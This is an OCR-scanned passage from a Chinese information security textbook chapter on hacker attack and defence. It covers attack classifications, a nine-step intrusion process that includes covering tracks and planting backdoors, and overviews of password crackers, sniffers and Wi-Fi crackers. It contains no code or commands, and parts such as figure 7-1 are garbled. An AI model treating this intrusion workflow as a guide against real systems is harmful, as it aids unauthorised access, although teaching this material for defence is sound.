几 个 黑客 工具 ,就 可 以 在 互联 网 上 进行 攻击 活动 ,黑客 工具 的 大 众 化 是 黑客 活动 频繁 的 主要 
原因 。 

(3) 动机 复杂 化 : 黑客 的 动机 目前 已 经 不 再 局 限于 为 了 国家 、 金 钱 和 刺激 。 已 经 和 国 
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际 的 政治 变化 、 经 济 变化 紧密 地 结合 在 一 起 。 

4. 黑客 精神 

要 成 为 一 名 好 的 黑客 ,需要 具备 4 种 基本 素质 :“Free” 精 神 、 探 索 与 创新 精神 、 反 传统 
精神 和 合作 精神 。 

(1)“Free”( 自 由 、 免 费 ) 精 神 。 需 要 在 网 络 上 和 本 国 以 及 国际 上 一 些 高 手 进行 广泛 的 
交流 ,并 有 一 种 奉献 精神 ,将 自己 的 心得 和 编写 的 工具 与 其 他 黑客 共享 。 

(2) 探索 与 创新 精神 。 所 有 的 黑客 都 是 喜欢 探索 软件 程序 奥秘 的 人 。 他 们 探索 程序 与 
系统 的 漏洞 ,在 发 现 问 题 的 同时 会 提出 解决 问题 的 方法 。 

(3) 反 传统 精神 。 找 出 系统 漏洞 ,并 策划 相关 的 手段 利用 该 漏洞 进行 攻击 ,这 是 黑客 永 
恒 的 工作 主题 ,而 所 有 的 系统 在 没有 发 现 漏洞 之 前 ,都 号 称 是 安全 的 。 

(4) 合作 精神 。 成 功 的 一 次 入 侵 和 攻击 ,在 目前 的 形式 下 , 单 靠 一 个 人 的 力量 已 经 没有 
办 法 完成 了 ,通常 需要 数 人 或 数 百 人 的 通力 协作 才能 完成 任务 ,互联 网 提供 了 不 同 国家 黑客 
交流 合作 的 平台 。 


7.2 黑客 攻击 的 分 类 


黑客 攻击 在 最 高 层次 ,攻击 可 分 为 主动 攻击 和 被 动 攻击 两 类 。 

(1) 主动 攻击 : 包含 攻击 者 访问 他 所 需 信 息 的 故意 行为 。 例 如 ,远程 登录 到 指定 机 器 
的 端口 25 找 出 公司 运行 的 邮件 服务 器 的 信息 ; 伪造 无 效 IP 地 址 去 连接 服务 器 ,使 接收 到 
错误 IP 地 址 的 系统 浪费 大 量 时 间 去 连接 那个 非法 地 址 。 攻 击 者 是 在 主动 地 做 一 些 不 利于 
公司 系统 的 事情 。 正 因为 如 此 ,如 果 要 寻找 他 们 是 很 容易 发 现 的 。 主 动 攻击 包括 拒绝 服务 
攻击 ,信息 算 改 、 资 源 使 用 、 欺 骗 等 攻击 方法 。 

(2) 被 动 攻 击 : 主要 是 搜集 信息 而 不 是 进行 访问 ,数据 的 合法 用 户 对 这 种 活动 一 点 也 

会 觉察 到 。 被 动 攻击 包括 嗅 探 ,信息 搜集 等 攻击 方法 。 

按照 TCP/IP 层次 进行 分 类 ,可 分 为 针对 数据 链 路 层 的 攻击 、 针 对 网 络 层 的 攻击 、 针 对 
传输 层 的 攻击 、 针 对 应 用 层 的 攻击 。 

(1) 针对 数据 链 路 层 的 攻击 : TCP/IP 在 该 层次 上 有 两 个 重要 的 协议 , 即 ARP( 地 址 解 
析 协 议 ) 和 RARP( 反 地 址 解析 协议 ) 。 前 面 讲 过 的 ARP 欺骗 和 伪装 属于 该 层次 。 

(2) 针对 网 络 层 的 攻击 ,该 层次 有 3 个 重要 协议 : ICMP( 互 联网 控制 报 文 协议 ) IP( 网 
际 协 议 ) IGMP( 因 特 网 组 管理 协议 ) 。 著 名 的 极 大 攻击 手法 都 在 这 个 层次 上 进行 ,如 Smurf 
攻击 、IP 碎片 攻击 ICMP 路 由 欺骗 等 。 

(3) 针对 传输 层 的 攻击 : TCP/IP 传输 层 有 两 个 重要 的 协议 (TCP 和 UDP) ,该 层次 的 
著名 攻击 手法 更 多 ,常见 的 有 Teardrop 攻击 (Teardrop attack)、Land 攻击 (Land attack)、 
SYN 洪水 攻击 (SYN flood attack)、TCP 序列 号 欺骗 和 攻击 等 ,会 话 支持 和 中 间 人 攻击 也 应 
属于 这 一 层次 。 

(4) 针对 应 用 层 的 攻击 : 该 层次 有 许多 不 同 的 应 用 协议 ,如 DNS、FTP、SMTP 等 ,针对 
协议 本 身 的 攻击 主要 是 DNS 欺骗 和 窃取 。 

按照 攻击 者 的 目的 分 类 ,可 分 为 DoS 和 DDoS Sniffer 监听 .会话 支持 与 网 络 欺 骗 、 获 得 
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被 攻击 主机 的 控制 权 , 针 对 应 用 层 协 议 的 缓冲 区 溢出 基本 上 都 是 为 了 得 到 被 攻击 主机 的 
Shell 。 
按 危 害 范围 分 类 ,可 分 为 局 域 网 范围 广域网 范围 。 


7.3 ”黑客 攻击 的 步 又 


通常 黑客 的 攻击 思路 与 策略 分 为 3 个 阶段 , 即 预 攻击 阶段 .攻击 阶段 .后 攻击 阶段 。 预 
攻击 阶段 主要 是 信息 的 搜集 ,包括 一 些 常 规 的 信息 获取 方式 ,如 端口 扫描 ,漏洞 扫描 、 搜 索引 
擎 社会 工程 学 等 。 在 攻击 阶段 采取 缓冲 区 洲 出 ,口令 猜测 、 应 用 攻击 等 技术 手段 。 后 攻击 
阶段 主要 释放 木马 、 密 码 破解 隐身、 清除 痕迹 ,如 图 7-1 所 示 。 


黑客 的 攻击 思路 与 策略 


预测 阶段 攻击 阶段 后 攻击 阶段 | 
| 而 | | 


| 漏 ‖ 搜 || 社 | | 组 | | 口 | | 应 | | 释 || 密 清 
洞 | 索 | 了 令 | | 用 如 || 可 隐 || 除 


扫 |‖ 引 | 天 
站 汉民 


图 7-1 黑客 的 攻击 思路 与 策略 


尽管 黑客 攻击 系统 的 技能 有 高 低 之 分 ,入 侵 系统 手法 多 种 多 样 , 但 他 们 对 目标 系统 实施 
攻击 的 流程 却 大 致 相同 。 其 攻击 过 程 可 归纳 为 9 个 步骤 : 踩点 ,扫描 、 查 点 、 获 取 访 问 权 、 权 
限 提升 窃取 、 掩 盖 踪迹 、 创 建 后 门 。 各 步 又 与 之 对 应 的 一 些 操作 如 表 7-1 所 示 。 


表 7-1 黑客 的 攻击 步骤 与 操作 


攻击 步骤 相应 操作 

踩点 使 用 Whios、DNS、Google、 百 度 等 工具 搜集 目标 信息 

扫描 利用 踩点 结果 ,查看 目标 系统 在 哪些 通道 使 用 哪些 服务 ,以 及 使 用 的 操作 系统 类 型 

查 点 根据 扫描 ,使 用 与 特定 操作 系统 及 服务 相关 的 技术 收集 账户 信息 ,共享 资源 及 export 等 信息 


获取 访问 权 | 发 起 攻击 获取 访问 权限 ,如 获取 失败 ,可 采取 拒绝 服务 攻击 
权限 提升 ”| 获取 权限 后 ,试图 成 为 Admin/root 或 超级 用 户 

窃取 改变 、 添 加、 删除 及 复制 用 户 数据 

掩盖 踪迹 “| 修改 、 删 除 系统 日 志 

创建 后 门 | 为 以 后 再 次 入 侵 做 准备 
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7.4 黑客 工具 软件 


7.4.1 黑客 工具 软件 的 分 类 


黑客 除了 掌握 基本 的 操作 系统 知识 以 外 ,还 掌握 如 各 类 扫描 器 ,一 些 比较 优秀 的 木马 软 
件 、 监 听 类 软件 等 工具 软件 。 

常用 黑客 软件 按 用 途 可 分 为 以 下 几 类 。 

(1) 防范 工具 类 。 这 是 从 安全 的 角度 出 发 涉及 的 一 类 软件 ,如 防火 墙 , 查 病毒 软件 、 系 
统 进程 监视 器 、 端 口 管 理 程序 等 。 这 类 软件 可 以 在 最 大 程度 上 保证 计算 机 使 用 者 的 安全 和 
个 人 隐私 ,不 被 黑客 破坏 。 网 络 服 务 器 对 于 此 类 软件 的 需要 也 是 十 分 重视 的 ,如 日 志 分 析 软 
件 、 系 统 入 侵 软件 等 可 以 帮助 管理 员 维 护 服务 器 并 对 入 侵 系 统 的 黑客 进行 追踪 。 

(2) 信息 搜集 类 。 信 息 搜 集 软件 种 类 比较 多 ,包括 端口 扫描 、 漏 洞 扫描 、 弱 口令 扫描 等 
扫描 类 软件 ; 还 有 监听 截获 信息 包 等 间谍 类 软件 ,其 大 多 数 属于 亦 正 亦 邪 的 软件 。 也 就 是 
说 ,无 论 正派 黑客 、 邪 派 黑客 、 系 统管 理 员 还 是 一 般 的 计算 机 使 用 者 ,都 可 以 使 用 该 类 软件 完 
成 各 自 不 同 的 目的 。 在 大 多 数 情况 下 ,黑客 使 用 该 类 软件 的 频率 更 高 ,因为 他 们 需要 依靠 此 
类 软件 对 服务 器 进行 全 方位 的 扫描 ,获得 尽 可 能 多 的 关于 服务 器 的 信息 ,在 对 服务 器 有 了 充 
分 了 解 之 后 ,才能 进行 黑客 动作 。 

(3) 木马 与 蠕虫 类 。 这 是 两 种 类 型 的 软件 ,不 过 它们 的 工作 原理 大 致 相同 ,都 具有 病毒 
的 隐藏 性 和 破坏 性 。 另 外 ,此 类 软件 还 可 以 由 拥有 控制 权 的 人 进行 操作 ,或 由 事先 精心 设计 
的 程序 完成 一 定 的 工作 。 当 然 , 这 类 软件 也 可 以 被 系统 管理 员 利 用 , 当 作 远 程 管理 服务 器 的 
工具 。 

(4) 洪水 类 。 所 谓 * 洪 水 ”, 即 信息 垃圾 炸弹 ,通过 大 量 的 垃圾 请 求 可 以 导致 目标 服务 器 
负载 超 负荷 而 崩溃 ,近年 来 网 络 上 又 开始 流行 DoS 分 散 式 攻 击 ,简单 地 说 也 可 以 将 其 归 入 
此 类 软件 中 。 洪 水 软件 还 可 以 用 作 邮 件 炸 弹 或 者 聊天 式 炸 弹 ,这 些 都 是 经 过 简化 并 由 网 络 
安全 爱好 者 程序 化 的 “傻瓜 式 ” 软 件 ,也 是 * 伪 黑客 手中 经 常 使 用 的 软件 。 

(5) 密码 破解 类 。 网 络 安全 得 以 保证 的 最 实用 方法 是 依靠 各 种 加 密 算 法 的 密码 系统 ， 
黑客 也 许可 以 很 容易 获得 一 份 密码 文件 ,但 是 如 果 没 有 加 密 算 法 , 它 仍 然 无 法 获得 真正 的 明 
文 ,因此 使 用 密码 破解 类 软件 势 在 必 行 ,利用 计算 机 的 高 速 计算 能 力 ,此 类 软件 可 以 用 密码 
字典 或 者 穷 举 等 方式 还 原 经 过 加 密 的 明文 。 

(6) 欺骗 类 。 如 果 和 希望 获得 上 面 提 到 的 明文 ,黑客 需要 对 密 文 进行 加 密 算法 还 原 ,但 如 
果 是 一 个 复杂 的 密码 ,破解 起 来 就 不 是 那么 简单 了 。 但 如 果 让 知道 密码 的 人 直接 告诉 黑客 
密码 的 原型 ,是 不 是 更 加 方便 ? 欺骗 类 软件 就 是 为 了 完成 这 个 目的 而 设计 的 。 

(7) 伪装 类 。 网 络 上 进行 的 各 种 操作 都 会 被 ISP、 服 务 器 记录 下 来 ,如 果 没 有 经 过 很 好 
的 伪装 就 进行 黑客 动作 ,很 容易 就 会 被 反 跟踪 技术 追查 到 黑客 的 所 在 ,所 以 伪装 自己 的 IP 
地 址 、 身 份 是 黑客 非常 重要 的 一 节 必修 课 , 但 是 伪装 技术 需要 高 深 的 网 络 知 识 , 一 开始 没有 
坚实 的 基础 就 要 用 到 这 一 类 软件 了 。 

常用 黑客 软件 按 性 质 可 分 为 以 下 几 类 。 
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(1) 扫描 类 软件 。 扫 描 是 黑客 的 眼睛 .通过 扫描 程序 ,黑客 可 以 找到 攻击 目标 的 IP 地 
址 、 开 放 的 端口 号 .服务 器 运行 的 版 本 程序 中 可 能 存在 的 漏洞 等 。 因 而 根据 不 同 的 扫描 目 
的 ,扫描 类 软件 又 分 为 地 址 扫描 器 .端口 扫 描 器 ,漏洞 扫描 器 3 个 类 别 。 在 很 多 人 看 来 ,这 些 
扫描 器 获得 的 信息 大 多 数 都 是 没有 用 处 的 ,然而 在 黑客 看 来 ,扫描 器 好 比 黑 客 的 眼睛 , 它 可 
以 让 黑客 清楚 地 了 解 目标 ,有 经 验 的 黑客 则 可 以 将 目标 * 摸 得 一 清二 楚 ”, 这 对 于 攻击 来 说 是 
至 关 重 要 的 。 同 时 扫描 器 也 是 网 络 管理 员 的 得 力 助手 ,网 络 管理 员 可 以 通过 它 及 时 了 解 自 
己 系 统 的 运行 状态 和 可 能 存在 的 漏洞 ,在 黑客 “下 手 ? 之 前 将 系统 中 的 隐患 清除 ,保证 服务 器 
的 安全 稳定 。 现 在 网 络 上 很 多 扫描 器 在 功能 上 都 设计 得 非常 强大 ,并 且 综 合 了 各 种 扫描 需 
要 ,将 各 种 功能 集成 于 一 身 。 这 对 于 初学 网 络 安全 的 学 习 者 来 说 无 疑 是 个 福音 ,因为 只 要 学 
习 者 手中 具备 一 款 优 秀 的 扫描 器 ,就 可 以 将 信息 收集 工作 轻松 完成 , 免 去 了 很 多 烦琐 的 工 
作 。 但 是 对 于 一 个 高 级 黑客 来 说 ,这 些 现成 的 工具 是 远 远 不 能 胜任 的 ,他 们 使 用 的 程序 大 多 
自己 编写 开发 ,这 样 在 功能 上 将 会 完全 符合 个 人 意图 ,而 且 可 以 针对 新 漏洞 及 时 对 扫描 器 进 
行 修改 ,在 第 一 时 间 获 得 最 宝贵 的 目标 资料 。 

(2) 远程 监控 类 软件 。 远 程 监控 也 称 为 "木马 ,这 种 程序 实际 上 是 在 服务 器 上 运行 一 
个 客户 端 软件 ,而 在 黑客 的 计算 机 中 运行 一 个 服务 端 软件 ,如 此 一 来 ,服务 器 将 会 变 成 黑客 
的 服务 器 的 * 手 下”, 也 就 是 说 黑客 将 会 利用 木马 程序 在 服务 器 上 开 一 个 端口 ,通过 这 种 特殊 
的 木马 功能 对 服务 器 进行 监视 .控制 。 因 此 ,只 要 学 习 者 掌握 了 某 个 木马 的 使 用 和 操作 方 
法 ,就 可 以 轻易 接管 网 络 服务 器 或 其 他 上 网 者 的 计算 机 。 

在 控制 了 服务 器 之 后 ,黑客 的 攻击 行动 也 就 接近 尾声 了 ,然而 在 做 这 件 事 情 之 前 ,黑客 
必须 想 办 法 让 服务 器 运行 自己 木马 的 那个 “客户 端 程序 ”, 这 就 需要 利用 漏洞 或 进行 欺骗 。 
欺骗 最 简单 ,就 是 想 办 法 让 操作 服务 器 的 人 (系统 管理 员 之 类 ) 运 行 黑客 的 客户 端 程序 ,而 利 
用 漏洞 则 要 初学 者 阅读 完 后 面 的 内 容 才 能 够 做 到 了 。 

(3) 病毒 和 蠕虫 。 首 先 声明 一 下 : 编写 病毒 的 做 法 并 不 属于 黑客 。 病 毒 只 不 过 是 一 种 
可 以 隐藏 复制 ,传播 自己 的 程序 ,这 种 程序 通常 具有 破坏 作用 ,虽然 病毒 可 以 对 互联 网 造成 
威胁 ,然而 它 并 没有 试图 寻找 程序 中 的 漏洞 ,所 以 制作 病毒 还 有 病毒 本 身 对 黑客 的 学 习 都 没 
有 实际 意义 。 之 所 以 提 到 病毒 ,是 因为 蠕虫 和 病毒 有 很 多 相似 性 ,蠕虫 也 是 一 段 程序 ,和 病 
毒 一 样 具有 隐藏 复制 ,传播 自己 的 功能 。 不 同 的 是 蠕虫 程序 通常 会 寻找 特定 的 系统 ,利用 
其 中 的 漏洞 完成 传播 自己 和 破坏 系统 的 作用 ,另外 蠕虫 程序 可 以 将 受到 攻击 的 系统 中 的 资 
料 传送 到 黑客 手中 ,这 要 看 蠕虫 设计 者 的 意图 ,因而 蠕虫 是 介 于 木马 和 病毒 之 间 的 一 类 
程序 。 

计算 机 蠕虫 是 自 包 含 的 程序 (或 一 套 程序 ) , 它 能 传播 自身 功能 的 复制 或 某 些 部 分 到 其 
他 的 计算 机 系统 中 (通常 是 经 过 网 络 连接 ) 。 蠕 虫 的 制造 需要 精深 的 网 络 知识 ,还 要 具备 高 
超 的 编程 水 平 , 对 于 一 个 初学 黑客 的 学 习 者 来 说 ,蠕虫 的 制造 和 使 用 都 是 比较 难 理解 的 。 

(4) 系统 攻击 和 密码 破解 。 这 类 软件 大 多 数 都 是 由 高 级 黑客 编写 出 来 的 , 供 初级 黑客 
使 用 的 现成 软件 ,软件 本 身 不 需要 使 用 者 具备 太 多 的 知识 ,使 用 者 只 要 按照 软件 的 说 明 操作 
就 可 以 达到 软件 的 预期 目的 ,因而 这 类 软件 不 具备 学 习 黑 客 知识 的 功效 。 不 过 这 类 软件 对 
于 黑客 很 重要 ,因为 它 可 以 大 幅度 减 小 黑客 的 某 些 烦琐 工作 ,使 用 者 经 过 对 软件 的 设置 就 可 
以 让 软件 自动 完成 重复 的 工作 ,或 者 由 软件 完成 大 量 的 猜测 工作 ,充分 利用 剩余 时 间 继 续 学 
习 网 络 知识 。 


第 7 章 黑客 攻防 剖析 169 


系统 攻击 类 软件 主要 分 为 信息 炸弹 和 破坏 炸弹 。 网 络 上 常见 的 垃圾 电子 邮件 就 是 这 
种 软件 的 “杰作 ”, 还 有 聊天 室 中 经 常 看 到 的 “ 踢 人 ”“ 委 人 ”类 软件 ,论坛 的 垃圾 灌水 器 、 系 
统 蓝屏 炸弹 也 都 属于 此 类 软件 的 变异 形式 。 如 果 学 习 者 能 够 认真 学 习 黑 客 知识 ,最 终 可 
以 自己 编写 类 似 的 工具 ,但 如 果 某 个 人 天 天 局 限于 应 用 此 类 软件 上 ,他 将 永远 是 一 个 * 伪 
黑客 ”。 

密码 破解 类 软件 和 上 面 的 软件 一 样 ,完全 依靠 它 将 对 学 习 黑 客 毫 无 帮助 。 对 于 真正 的 
黑客 来 说 ,这 种 软件 可 以 帮助 寻找 系统 登录 密码 ,相对 于 利用 漏洞 ,暴力 破解 密码 要 简单 许 
多 ,但 是 效率 会 非常 低 ,真正 的 黑客 无 论 是 使 用 密码 破解 软件 还 是 利用 漏洞 进入 系统 之 后 ， 
都 达到 了 自己 入 侵 的 目的 ,因此 对 于 如 何 进 入 系统 ,对 于 某 些 溺爱 系统 攻击 的 黑客 来 说 无 关 
紧要 。 

(5) 监听 类 软件 。 通 过 监听 ,黑客 可 以 截获 网 络 的 信息 包 , 之 后 对 加 密 的 信息 包 进行 破 
解 , 进 而 分 析 包 内 的 数据 ,获得 有 关系 统 的 信息 ; 也 可 能 截获 个 人 上 网 的 信息 包 , 分 析 得 到 
上 网 账号 、 系 统 账号 ,电子 邮件 账号 等 个 人 隐私 资料 。 网 络 数据 大 多 经 过 加 密 , 所 以 用 它 来 
获得 密码 比较 艰难 ,因而 在 更 多 的 情况 下 ,这 类 软件 是 提供 给 程序 开发 者 或 网 络 管理 员 的 ， 
他 们 利用 这 类 软件 进行 程序 的 调试 或 服务 器 的 管理 工作 。 


7.4.2 黑客 工具 软件 介绍 


1. Nessus: 最 好 的 UNIX 漏洞 扫描 工具 

Nessus 是 最 好 的 免费 网 络 漏洞 扫描 器 , 它 可 以 运行 于 几乎 所 有 的 UNIX 平台 上 。 它 不 
仅 永久 升级 ,还 免费 提供 多 达 11 000 种 插件 (但 需要 注册 并 接受 EULA-acceptance- 终 端 用 
户 授 权 协 议 )。 它 的 主要 功能 是 远程 或 本 地 (已 授权 的 ) 安 全 检查 、 客 户 端 /服务 器 架构 、 
GTK(Linux 下 的 一 种 图 形 界面 7 图形 界 面 . 内 置 脚本 语言 编译 器 ,可 以 用 其 编写 自 定 义 捅 
件 , 或 用 来 阅读 别人 编写 的 插件 。 

2. Wireshark: 网 络 嗅 探 工具 

Wireshark(2006 年 夏天 之 前 称 为 Ethereal) 是 一 款 非常 棒 的 UNIX 和 Windows 上 的 开 
源 网 络 协议 分 析 器 。 它 可 以 实时 检测 网 络 通信 数据 ,也 可 以 检测 其 抓 取 的 网 络 通信 数据 快 
照 文 件 。 可 以 通过 图 形 界面 浏览 这 些 数据 ,可 以 查看 网 络 通信 数据 包 中 每 一 层 的 详细 内 容 。 
Wireshark 拥有 许多 强大 的 特性 : 包含 有 强 显 示 过 滤器 语言 和 查看 TCP 会 话 重 构 流 的 能 
力 ; 它 更 支持 上 百 种 协议 和 媒体 类 型 ; 拥有 一 个 类 似 tcpdump( 一 个 Linux 下 的 网 络 协议 分 
析 工 具 ) 的 名 为 tethereal 的 命令 行 版 本 。 

3. Snort: 一 款 广 受 欢迎 的 开源 IDS 工具 

这 款 小 型 的 人 侵 检 测 和 预防 系统 擅长 于 通信 分 析 和 IP 数据 包 登 录 (Packet Logging) 。 
Snort 除了 能 够 进行 协议 分 析 、 内 容 搜索 和 包含 其 他 许多 预 处 理 程序 ,还 可 以 检测 上 千 种 蠕 
虫 病毒 ,漏洞 端口 扫描 及 其 他 可 疑 行为 检测 。Snort 使 用 一 种 简单 的 基于 规则 的 语言 来 描 
述 网 络 通信 ,以 及 判断 对 于 网 络 数据 是 放行 还 是 拦截 ,其 检测 引擎 是 模块 化 的 。 用 于 分 析 
Snort 警报 的 网 页 形式 的 引擎 BASE(Basic Analysis and Security Engine, 即 基本 分 析 和 安 
全 引擎 ) 可 免费 获得 。 
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4. Netcat: 网 络 瑞士 军刀 

这 个 简单 的 小 工具 可 以 读 和 写 经 过 TCP 或 UDP 网 络 连接 的 数据 。 它 被 设计 成 一 个 可 
靠 的 可 以 被 其 他 程序 或 脚本 直接 和 简单 使 用 的 后 台 工 具 。 同 时 , 它 也 是 一 个 功能 多 样 的 网 
络 调试 和 检查 工具 ,因为 它 可 以 生成 几乎 所 有 想 要 的 网 络 连接 ,包括 通过 端口 绑 定 来 接收 输 
入 连接 。Netcat 最 早 由 Hobbit 在 1995 年 发 布 ,但 在 其 广 为 流 传 的 情况 下 并 没有 得 到 很 好 
的 维护 。 现 在 nc110. tgz 已 经 很 难 找 了 。 这 个 简单 易 用 的 工具 促使 了 很 多 人 编写 出 了 很 多 
其 他 Netcat 应 用 ,其 中 有 很 多 功能 都 是 原版 本 没有 的 。 其 中 最 有 趣 的 是 Socat, 它 将 Netcat 扩 
展 成 可 以 支持 多 种 其 他 socket 类 型 .SSL 加 密 、SOCKS 代理 ,以 及 其 他 扩展 的 更 强大 的 工具 。 
它 也 在 本 列表 中 得 到 了 自己 的 位 置 (第 71 位 )。 其 他 基于 Netcat 的 工具 还 有 OpenBSD's nc、 
Cryptcat、Netcat6、PNetcat、SBD, 又 称 为 GNU Netcat。 

5. Hping2: 网 络 探测 工具 

Hping2 是 ping 的 超级 变种 。 这 个 小 工具 可 以 发 送 自 定义 的 ICMP、UDP 和 TCP 数据 
包 , 并 接收 所 有 反馈 信息 。 它 的 灵感 来 源 于 ping 命令 ,但 其 功能 远 远 超过 ping。 它 还 包含 
一 个 小 型 的 路 由 跟踪 模块 ,并 支持 IP 分 段 。 此 工具 可 以 在 常用 工具 无 法 对 有 防火 墙 保护 的 
主机 进行 路 由 跟踪 /ping/ 探 测 时 大 显 身手 。 它 经 常 可 以 帮助 用 户 找 出 防火 墙 的 规则 集 , 当 
然 还 可 以 通过 它 来 学 习 TCP/IP 协议 ,并 作 一 些 IP 协议 的 实验 。 

6.Kismet: 一 款 超 强 的 无 线 嗅 探 器 

Kismet 是 一 款 基于 命令 行 (ncurses) 的 802. 11 Layer2 无 线 网 络 探测 器 、 嗅 探 器 和 入 侵 
检测 系统 。 它 对 网 络 进行 被 动 嗅 探 ( 相 对 于 许多 主动 工具 ,如 NetStumbler) ,可 以 发 现 隐形 
网 络 ( 非 信 标 )。 它 可 以 通过 嗅 探 TCP、UDP、ARP 和 DHCP 数据 包 来 自动 检测 网 络 IP 段 ， 
以 Wireshark/Tcpdump 兼容 格式 记录 通信 日志, 更 加 可 以 将 被 检测 到 的 网 络 分 块 并 按照 下 
载 的 分 布 图 进行 范围 估计 。 因 此 ,这 款 工 具 一 般 被 wardrivin、warwalking、warflying 等 所 
使 用 。 

7. Tcpdump: 最 经 典 的 网 络 监控 和 数据 捕获 嗅 探 器 

在 Ethereal(Wireshark) 出 现 之 前 大 家 都 用 Tecpdump ,而 且 很 多 人 现在 还 在 一 直 使 用 。 
它 也 许 没 有 Wireshark 那么 多 功能 (如 漂亮 的 图 形 界面 ,或 数 以 百 计 的 应 用 协议 逻辑 分 析 ) ， 
但 它 能 出 色 地 完成 很 多 任务 ,并 且 漏 洞 非常 少 ,消耗 系统 资源 也 非常 少 。 它 很 少 添加 新 特性 
了 ,但 经 常 修复 一 些 Bug 和 维持 较 小 的 体积 。 它 能 很 好 地 跟踪 网 络 问题 来 源 , 并 能 监控 网 
络 活动 。 其 Windows 下 的 版 本 称 为 WinDump。Libpcap/WinPcap 的 包 捕 获 库 就 是 基于 
Tcpdump, 它 也 用 在 Nmap 等 其 他 工具 中 。 

8. Cain and Abel: Windows 平台 上 最 好 的 密码 恢复 工具 

UNIX 用 户 经 常 声称 正 是 因为 UNIX 平台 下 有 很 多 非常 好 的 免费 安全 工具 ,所 以 
UNIX 才 会 成 为 最 好 的 平台 ,而 Windows 平台 一 般 不 在 他 们 的 考虑 范围 之 内 。 但 Cain and 
Abel 确实 让 人 眼前 一 亮 。 这 种 只 运行 于 Windows 平台 的 密码 恢复 工具 可 以 做 很 多 事情 。 
它 可 以 通过 嗅 探 网 络 来 找到 密码 、 利 用 字典 破解 加 密 密 码 、 暴 力 破解 密码 和 密码 分 析 、 记 录 
VoIP 会 话 、 解 码 非常 复杂 的 密码 、 星 号 查看 、 剥 离 缓存 密码 及 分 析 路 由 协议 。 另 外 其 文档 也 
很 齐全 。 
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9. John the Ripper: 一 款 强 大 的 、 简 单 的 ,支持 多 平台 的 密码 破解 器 

John the Ripper 是 最 快 的 密码 破解 器 ,当前 支持 多 种 主流 UNIX (官方 支持 11 种 , 没 
有 计算 不 同 的 架构 ).DOS、Win32、BeO 和 OpenVMS。 它 的 主要 功能 就 是 检测 弱 UNIX 密 
码 。 它 支持 主流 UNIX 下 的 多 种 (3 种 ) 密 码 哈 希 加 密 类 型 ,其 他 哈 希 类 型 可 以 通过 补丁 包 
加 载 。 

10. Ettercap : 为 交换 式 局 域 网 提供 更 多 保护 

Ettercap 是 一 款 基 于 终端 的 以 太 网络 局 域 网 嗅 探 器 /拦截 器 /日 志 器 。 它 支持 主动 和 被 
动 的 多 种 协议 解析 (甚至 是 SSH 和 https 这 种 加 密 过 的 )。 还 可 以 进行 已 建立 连接 的 数据 
注入 和 实时 过 滤 ,保持 连接 同步 。 大 部 分 嗅 探 模式 都 是 强大 且 全 面 的 嗅 探 组 合 ,支持 插件 ， 
能 够 在 交换 式 局 域 网 中 通过 使 用 操作 系统 指纹 (主动 或 被 动 ) 技 术 可 以 得 出 局 域 网 结构 。 

11. THC Amap: 一 款 应 用 程序 指纹 扫描 器 

Amap 是 一 款 很 棒 的 程序 , 它 可 以 检测 出 某 一 端口 正在 被 什么 程序 监听 。 因 为 其 独 有 
的 version detection 特性 ,所 以 其 数据 库 不 会 像 Nmap 一 样 变 得 很 大 ,在 Nmap 检测 某 一 服 
务 失败 或 者 其 他 软件 不 起 作用 时 可 以 考虑 使 用 之 。Amap 的 另 一 特性 是 其 能 够 解析 Nmap 
输出 文件 。 这 也 是 THC 贡献 的 另 一 款 很 有 价值 的 工具 。 

12. GFI LANguard: 一 款 Windows 平台 上 的 商业 网 络 安全 扫描 器 

GFI LANguard 通过 对 IP 网 络 进行 扫描 来 发 现 运 行 中 的 计算 机 ,然后 尝试 收集 主机 上 
运行 的 操作 系统 版 本 和 正在 运行 的 应 用 程序 。 它 可 以 收集 到 了 Windows 主机 上 的 Service 
Pack 级 别 ,缺少 的 安全 更 新 ,无 线 访问 接 入 点 .USB 设备 .开放 的 共享 .开放 的 端口 .正在 运 
行 的 服务 和 应 用 程序 、 主 要 注册 表 项 、 弱 密码 、 用 户 和 组 别 , 以 及 其 他 更 多 信息 。 扫 描 结 果 保 
存在 一 份 可 自 定义 /可 查询 的 HTML 报告 文档 中 。 它 还 含有 一 个 补丁 管理 器 ,可 以 检查 并 
安装 缺少 的 补丁 。 试 用 版 可 以 免费 获得 ,但 只 能 使 用 30 天 。 

13. Aircrack: 最 快 的 WEP/WPA 破解 工具 

Aircrack 是 一 套用 于 破解 802. 11a/b/g WEP 和 WPA 的 工具 套装 。 一 旦 收集 到 足够 
的 加 密 数 据 包 , 它 可 以 破解 40 一 512 位 的 WEP 密 匙 , 它 也 可 以 通过 高 级 加 密 方 法 或 暴力 破 
解 来 破解 WPA 1 或 WPA 2 网 络 。 套装 中 包含 airodump (802. 11 数据 包 捕 获 程序 )、 
aireplay (802. 11 数据 包 注 入 程序 ) 、aircrack (静态 WEP 和 WPA-PSK 破解 ), 和 airdecap 
(解密 WEP/WPA 捕获 文件 ) 。 

14. SuperScan: 运行 于 Windows 平台 之 上 的 端口 扫描 器 .ping 工具 和 解析 器 

SuperScan 是 一 款 Foundstone 开发 的 免费 的 只 运行 于 Windows 平台 之 上 的 不 开源 的 
TCP/UDP 端口 扫描 器 。 它 其 中 还 包含 许多 其 他 网 络 工具 ,如 ping、 路 由 跟踪 、http head 和 
Whois。 

15. Netfilter: 最 新 的 Linux 核心 数据 包 过 滤器 /防火 墙 

Netfilter 是 一 款 强大 的 运行 于 标准 Linux 核心 上 的 包 过 滤器 。 它 集成 了 用 户 空 间 IP 
列表 工具 。 当 前 , 它 支持 包 过 滤 (无 状态 或 有 状态 )、. 所 有 类 型 的 网 络 地 址 和 端口 转换 
(NAT/NAPT) 并 支持 多 API 层 第 三 方 扩展 。 它 包含 多 种 不 同 模块 用 来 处 理 不 规则 协议 ， 
如 FTP。 


172 信息 安全 与 技术 (第 2 版 ) 


7.5 黑客 攻击 防范 


在 网 络 环境 下 ,由 于 种 种 原因 ,网 络 被 入 侵 和 攻击 是 难免 的 。 但 是 ,通过 加 强 管理 和 采 
用 必要 的 技术 手段 可 以 减少 人 侵 和 攻击 行为 ,避免 因 和 人 侵 和 攻击 造成 的 各 种 损失 。 下 面 就 
介绍 几 种 主要 的 防范 人 侵 和 攻击 的 技术 措施 。 

防范 黑客 攻击 ,要 从 以 下 几 个 方面 入 手 。 

1. 网 络 访问 控制 技术 

网 络 访问 控制 技术 是 网 络 安全 防范 和 保护 的 主要 核心 策略 , 它 的 主要 任务 是 保证 网 络 
资源 不 被 非法 使 用 和 访问 。 访 问 控制 规定 了 主体 对 客体 访问 的 限制 ,并 在 身份 识别 的 基础 
